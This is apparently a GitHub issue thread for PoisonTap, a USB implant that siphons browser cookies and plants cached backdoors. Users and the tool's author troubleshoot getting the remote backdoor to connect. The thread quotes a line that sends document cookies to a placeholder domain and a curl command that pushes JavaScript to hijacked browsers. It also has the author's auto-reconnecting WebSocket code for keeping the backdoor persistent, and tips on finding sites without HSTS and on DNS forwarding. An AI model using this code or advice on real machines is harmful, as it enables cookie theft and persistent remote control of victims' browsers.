samyk/poisontap #29: Having trouble with the backdoor

Eastonboy99, 2016-11-20:
When the pi is plugged in, posiontap kicks off just fine. The only problem I have is the backdoor is not connecting. I may be just a user error but I can't figure it out. Also there is a target_backdoor.js that has a link to a log.php. I didn't see a log.php in the repo or a connection like it in the backend_server.js
Thanks for any help.

samyk, 2016-11-20:
Did you adjust YOUR.DOMAIN in backdoor.html and target_backdoor.js? Are you running backend_server.js on YOUR.DOMAIN?

rough007, 2016-11-20:
I also have a question about how log.php is used.  I'm having the same issue where poisontap will capture to the device but nothing is going to my publicly available server.  I have used Node to start backend_server.js on my server, adjusted both target_backdoor.js and backdoor.html to use my server public IP address and I can send curl http://<my public ip address>:1337/exec?alert("muahahahaha").

I get this on my public server: 
root@<myserver>:~# node backend_server.js
Sun Nov 20 2016 16:12:31 GMT+0000 (UTC) Server is listening on port 1337
Sun Nov 20 2016 16:12:34 GMT+0000 (UTC) HTTP server. URL /exec?alert(muahahahaha) requested.

But I don't see any traffic from my poisontap nor do I seen any requests for my IP address when I run wireshark on the wifi adapter of my target workstation.  Any tips for troubleshooting would be greatly appreciated.

samyk, 2016-11-20:
Sounds like your browser may not be hitting it. I'd open the Network tab of devtools to verify the websocket is being made (there's a "WS" attribute you can select in Chrome to only see websockets).

Eastonboy99, 2016-11-20:
I don't see any WS traffic. Am I supposed to go to any website (e.g. http://nfl.com) and it should connect?

samyk, 2016-11-20:
Yes -- you should see the PT animation (I've just committed an updated version that allows you to disable the animation). If not, perhaps a DNS poisoning issue or network issue

rough007, 2016-11-20:
I liked the animation for testing and being able to disable it is a good tweak

Eastonboy99, 2016-11-20:
In theory, the backend server should work on my internal network correct?

samyk, 2016-11-20:
It should as your internal network should still be accessible while PT is plugged in.

Actually, I probably should include an auto-reconnecting websocket in target_injected_xhtmljs.html (essentially backdoor.html) -- that way it will autoconnect once taken over (and once PT is unplugged so that it can access the Internet, unless you're running the backdoor server internally. It currently only connects back to the backdoor when you reach a poisoned URL, eg http://192.168.0.1.ip.samy.pl/PoisonTap

rough007, 2016-11-20:
In the Chrome Dev Tools window I see that all of the connections are failing with one of these messages:

Example
GET http://airbnb.com/PoisonTap net::ERR_CONNECTION_REFUSED

Two types of errors:
1.) net::ERR_CONNECTION_REFUSED
2.) net::ERR_BLOCKED_BY_CLIENT

samyk, 2016-11-20:
You're running into many sites that have now implemented HSTS to prevent HTTPS downgrade attacks. I chose http://nfl.com as an example as it doesn't use HSTS. businessinsider.com and cbsnews.com are two other highly traffic'd sites that come to mind (Pandora was working but they just switched)

samyk, 2016-11-20:
Actually the connection refused error is interesting -- for one of those, what IP is the hostname pointing to? You may need an iptables rule on PT to forward back to 1.0.0.1, in most cases my DNS spoofer was taking over

rough007, 2016-11-20:
It appears that the 1.0.0.1 DNS server (PT DNS) request is timing out and not returning anything.

Eastonboy99, 2016-11-20:
I think mine is not reaching the poisoned url when PoisonTap is unplugged. If I go to http://192.168.0.1.ip.samy.pl, the websocket connects. But if I load http://nfl.com, it does not connect

rough007, 2016-11-20:
yeah, it looks like there are a lot that are completing.  So now that we know that I've verified that part works I'm still not seeing connecting WS to my public IP address.

I checked target_backdoor.js and the line points to a subdirectory and a log.php file that I didn't setup.  I also don't see where Node configures these in backend_server.js.  Should I set something up on the public server or adjust the code in target_backdoor.js?  It looks like I need php and some additional file(s) on the backend server as it's written.

line from target_backdoor.js:
new Image().src='http://YOUR.DOMAIN/poisontap/log.php?log='+document.cookies;

rough007, 2016-11-20:
Also interesting is that in my case, I cannot get to any site at all from the target workstation with poisontap is connected to it.  It almost appears like poisontap can't talk to the internet so the communication never goes out from the poisontap.

samyk, 2016-11-20:
That's correct, PoisonTap cannot communicate with the Internet (unless you want to add a gateway). The goal of PT is to first extract cookies from the target machine, then to plant the backdoors which produce the outbound websockets (though those cannot trigger until you've pulled PT back out)

rough007, 2016-11-20:
aha!  Thank you for clarifying that and for your patience.  Still working on why I'm not seeing any requests to my public server nor any traffic to the public server from the target machine yet

rough007, 2016-11-20:
How do I force a test of target host to the publicly available server backend connection?

ShadwDrgn, 2016-11-28:
I've noticed that the append lines were commented that add the iframes to the document. After uncommenting those I get connections to my internal backend server WHILE PT is plugged into the device, but once unplugged visiting a page that was supposedly force-cached does NOT result in a new connection being made to the backend server. It seems as though no backdoor persists. Whether the lines are commented or not this aspect does not function properly.

alexmcc89, 2016-11-29:
I'm also having trouble getting the backdoor feature to work. When I connect my pi to my laptop, the target_injected_xhtmljs.html page opens in the default browser after a few seconds, successfully pulling all the cookies and writing the poisontap.cookies.log to the pi. My understanding is that the websocket session doesn't get established to my public server while the pi is connected to the laptop, since it's preventing it from reaching the Internet. I'm expecting that when I disconnect the pi, and try to visit a website that was siphoned, it will try to open the websocket session by loading the cached backdoor content, is this correct? 

I have the backend_server.js script running on my server, and I'm able to manually run the backdoor.html page, it connects successfully and I'm able to send it curl commands, so I'm fairly sure that part is working fine. I'm just not sure how to confirm that the backdoors are being cached correctly. 

Also looking at my poisontap.cookies.log, I never see an instance of the target_backdoor.js file being used. In other words, the log file never contains the entry ">>>Known CDN", would this be related to the backdoor not working? It seems as though only the xhtmljs and backdoor.html files are being returned by pi_poisontap.js. Sorry for the lengthy post, thanks for your time.

samyk, 2016-11-29:
The websocket connection is currently only in the cached /PoisonTap pages (backdoor.html), and isn't very resilient in its current incarnation (it doesn't retry on fail). I'll need to add it to target_injected_xhtmljs.html and have it reconnect on fail/disconnect to make it occur as soon as you pull out the device (or happy to accept a pull from anyone else!)

alexmcc89, 2016-11-29:
Oh I see now!
I just tried again, but this time I'm visiting http://<domain>/PoisonTap pages after disconnecting the pi, and they connect! I was expecting it to connect when visiting http://<domain>. Like you're saying, I guess the ideal way is to have the target_injected_xhtmljs.html page initiate the connection upon removal of the pi. If only I had the know-how to help you add this... Thanks for the super fast reply!

samyk, 2016-11-29:
Honestly copying the html from backdoor.html to (an HTML section of) target_injected_xhtmljs.html should do it. To keep reconnecting on failure, probably changing the socket-related backdoor.html code to do something like:
```javascript
// totally untested
var socket;
function connect()
{
  socket = new WebSocket('ws://YOUR.DOMAIN:1337');
  socket.onerror = socket.onclose = function (error) {
    console.log('WebSocket error or closed: ' + error);
    setTimeout(connect, 1000);
  };
  socket.onmessage = function (message) {
    content.innerHTML += message.data +'<br />';
    try { obj = JSON.parse(message.data); } catch(e) { }
    if (typeof(obj) === 'object')
      handleObj(obj);
  };
};
```

grimxd, 2016-12-02:
I am having the same problem with the websocket not opening. (I edited both backdoor.html and target_backdoor.js with my public IP).
I have used Node to start backend_server.js on my server, adjusted both target_backdoor.js and backdoor.html to use my server public IP address and I can send curl http://:1337/exec?alert("muahahahaha"). (I even opened the 1337 port in the router)

I get this on my public server:
root@:~# node backend_server.js
Sun Nov 20 2016 16:12:31 GMT+0000 (UTC) Server is listening on port 1337
Sun Nov 20 2016 16:12:34 GMT+0000 (UTC) HTTP server. URL /exec?alert(muahahahaha) requested.

When I connect PI Zero to target machine it opens a page in browser with the poisontap animation and siphones cookies. But in the chrome devtools > WS there is no websocket open. I tried to disconnect PI and navigate to a an affected site (eg. nfl.com) on the target machine and still no websocket in chrome dev tools.
**The target PC and the server PC are on the same network. Would this make it not work?**